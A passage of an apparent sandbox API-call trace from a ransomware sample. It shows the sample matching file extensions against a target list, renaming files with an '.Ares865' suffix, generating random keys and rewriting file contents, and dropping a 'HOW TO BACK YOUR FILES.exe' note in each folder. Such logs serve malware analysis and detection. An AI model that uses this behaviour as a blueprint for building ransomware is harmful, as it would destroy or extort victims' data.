[0060.502] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0060.502] lstrlenW (lpString="dsk") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0060.502] lstrlenW (lpString="dsn") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0060.502] lstrlenW (lpString="dtsx") returned 4 [0060.502] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0060.502] lstrlenW (lpString="dxl") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0060.502] lstrlenW (lpString="eco") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0060.503] lstrlenW (lpString="ecx") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0060.503] lstrlenW (lpString="edb") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0060.503] lstrlenW (lpString="epim") returned 4 [0060.503] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0060.503] lstrlenW (lpString="fcd") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0060.503] lstrlenW (lpString="fdb") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0060.503] lstrlenW (lpString="fic") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0060.503] lstrlenW (lpString="flexolibrary") returned 12 [0060.503] lstrlenW (lpString="fm5") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0060.503] lstrlenW (lpString="fmp") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0060.503] lstrlenW (lpString="fmp12") returned 5 [0060.503] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0060.503] lstrlenW (lpString="fmpsl") returned 5 [0060.503] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0060.503] lstrlenW (lpString="fol") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0060.503] lstrlenW (lpString="fp3") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0060.503] lstrlenW (lpString="fp4") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0060.503] lstrlenW (lpString="fp5") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0060.503] lstrlenW (lpString="fp7") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0060.503] lstrlenW (lpString="fpt") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0060.503] lstrlenW (lpString="frm") returned 3 [0060.503] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0060.503] lstrlenW (lpString="gdb") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.504] lstrlenW (lpString="gdb") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.504] lstrlenW (lpString="grdb") returned 4 [0060.504] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0060.504] lstrlenW (lpString="gwi") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0060.504] lstrlenW (lpString="hdb") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0060.504] lstrlenW (lpString="his") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0060.504] lstrlenW (lpString="ib") returned 2 [0060.504] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0060.504] lstrlenW (lpString="idb") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0060.504] lstrlenW (lpString="ihx") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0060.504] lstrlenW (lpString="itdb") returned 4 [0060.504] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0060.504] lstrlenW (lpString="itw") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0060.504] lstrlenW (lpString="jet") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0060.504] lstrlenW (lpString="jtx") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0060.504] lstrlenW (lpString="kdb") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0060.504] lstrlenW (lpString="kexi") returned 4 [0060.504] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0060.504] lstrlenW (lpString="kexic") returned 5 [0060.504] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0060.504] lstrlenW (lpString="kexis") returned 5 [0060.504] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0060.504] lstrlenW (lpString="lgc") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0060.504] lstrlenW (lpString="lwx") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0060.504] lstrlenW (lpString="maf") returned 3 [0060.504] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0060.504] lstrlenW (lpString="maq") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0060.505] lstrlenW (lpString="mar") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0060.505] lstrlenW (lpString="marshal") returned 7 [0060.505] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0060.505] lstrlenW (lpString="mas") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0060.505] lstrlenW (lpString="mav") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0060.505] lstrlenW (lpString="maw") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0060.505] lstrlenW (lpString="mdbhtml") returned 7 [0060.505] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0060.505] lstrlenW (lpString="mdn") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0060.505] lstrlenW (lpString="mdt") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0060.505] lstrlenW (lpString="mfd") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0060.505] lstrlenW (lpString="mpd") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0060.505] lstrlenW (lpString="mrg") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0060.505] lstrlenW (lpString="mud") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0060.505] lstrlenW (lpString="mwb") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0060.505] lstrlenW (lpString="myd") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0060.505] lstrlenW (lpString="ndf") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0060.505] lstrlenW (lpString="nnt") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0060.505] lstrlenW (lpString="nrmlib") returned 6 [0060.505] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0060.505] lstrlenW (lpString="ns2") returned 3 [0060.505] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0060.505] lstrlenW (lpString="ns3") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0060.506] lstrlenW (lpString="ns4") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0060.506] lstrlenW (lpString="nsf") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0060.506] lstrlenW (lpString="nv") returned 2 [0060.506] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0060.506] lstrlenW (lpString="nv2") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0060.506] lstrlenW (lpString="nwdb") returned 4 [0060.506] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0060.506] lstrlenW (lpString="nyf") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0060.506] lstrlenW (lpString="odb") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.506] lstrlenW (lpString="odb") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.506] lstrlenW (lpString="oqy") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0060.506] lstrlenW (lpString="ora") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0060.506] lstrlenW (lpString="orx") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0060.506] lstrlenW (lpString="owc") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0060.506] lstrlenW (lpString="p96") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0060.506] lstrlenW (lpString="p97") returned 3 [0060.506] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0060.506] lstrlenW (lpString="pan") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0060.507] lstrlenW (lpString="pdb") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0060.507] lstrlenW (lpString="pdm") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0060.507] lstrlenW (lpString="pnz") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0060.507] lstrlenW (lpString="qry") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0060.507] lstrlenW (lpString="qvd") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0060.507] lstrlenW (lpString="rbf") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0060.507] lstrlenW (lpString="rctd") returned 4 [0060.507] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0060.507] lstrlenW (lpString="rod") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0060.507] lstrlenW (lpString="rodx") returned 4 [0060.507] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0060.507] lstrlenW (lpString="rpd") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0060.507] lstrlenW (lpString="rsd") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0060.507] lstrlenW (lpString="sas7bdat") returned 8 [0060.507] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0060.507] lstrlenW (lpString="sbf") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0060.507] lstrlenW (lpString="scx") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0060.507] lstrlenW (lpString="sdb") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0060.507] lstrlenW (lpString="sdc") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0060.507] lstrlenW (lpString="sdf") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0060.507] lstrlenW (lpString="sis") returned 3 [0060.507] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0060.508] lstrlenW (lpString="spq") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0060.508] lstrlenW (lpString="te") returned 2 [0060.508] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0060.508] lstrlenW (lpString="teacher") returned 7 [0060.508] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0060.508] lstrlenW (lpString="tmd") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0060.508] lstrlenW (lpString="tps") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0060.508] lstrlenW (lpString="trc") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.508] lstrlenW (lpString="trc") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.508] lstrlenW (lpString="trm") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0060.508] lstrlenW (lpString="udb") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0060.508] lstrlenW (lpString="udl") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0060.508] lstrlenW (lpString="usr") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0060.508] lstrlenW (lpString="v12") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0060.508] lstrlenW (lpString="vis") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0060.508] lstrlenW (lpString="vpd") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0060.508] lstrlenW (lpString="vvv") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0060.508] lstrlenW (lpString="wdb") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0060.508] lstrlenW (lpString="wmdb") returned 4 [0060.508] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0060.508] lstrlenW (lpString="wrk") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0060.508] lstrlenW (lpString="xdb") returned 3 [0060.508] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0060.509] lstrlenW (lpString="xld") returned 3 [0060.509] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0060.509] lstrlenW (lpString="xmlff") returned 5 [0060.509] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0060.509] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini.Ares865") returned 102 [0060.509] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0060.509] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.510] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0060.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.510] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.511] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.511] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.511] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x164 [0060.513] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0060.514] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.515] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.515] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.515] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.515] CloseHandle (hObject=0x164) returned 1 [0060.515] CloseHandle (hObject=0x15c) returned 1 [0060.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.516] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.516] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.516] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.516] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.516] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0060.516] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0060.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0060.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0060.516] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned 82 [0060.516] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0060.516] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.516] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.517] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.517] GetLastError () returned 0x0 [0060.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.517] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.517] CloseHandle (hObject=0x12c) returned 1 [0060.517] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.517] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.517] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.517] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.517] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.517] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.517] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.517] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.517] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.517] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.517] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.517] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.517] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.517] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0060.517] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0060.517] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0060.517] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0060.517] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0060.518] lstrlenW (lpString="desktop.ini") returned 11 [0060.518] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*") returned 84 [0060.518] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0060.518] lstrlenW (lpString="desktop.ini") returned 11 [0060.518] lstrlenW (lpString="Ares865") returned 7 [0060.518] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0060.518] lstrlenW (lpString=".dll") returned 4 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0060.518] lstrlenW (lpString=".lnk") returned 4 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0060.518] lstrlenW (lpString=".ini") returned 4 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0060.518] lstrlenW (lpString=".sys") returned 4 [0060.518] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0060.518] lstrlenW (lpString="desktop.ini") returned 11 [0060.518] lstrlenW (lpString="bak") returned 3 [0060.518] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0060.518] lstrlenW (lpString="ba_") returned 3 [0060.518] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0060.518] lstrlenW (lpString="dbb") returned 3 [0060.518] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0060.518] lstrlenW (lpString="vmdk") returned 4 [0060.518] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0060.518] lstrlenW (lpString="rar") returned 3 [0060.518] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0060.518] lstrlenW (lpString="zip") returned 3 [0060.518] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0060.518] lstrlenW (lpString="tgz") returned 3 [0060.518] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0060.518] lstrlenW (lpString="vbox") returned 4 [0060.519] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0060.519] lstrlenW 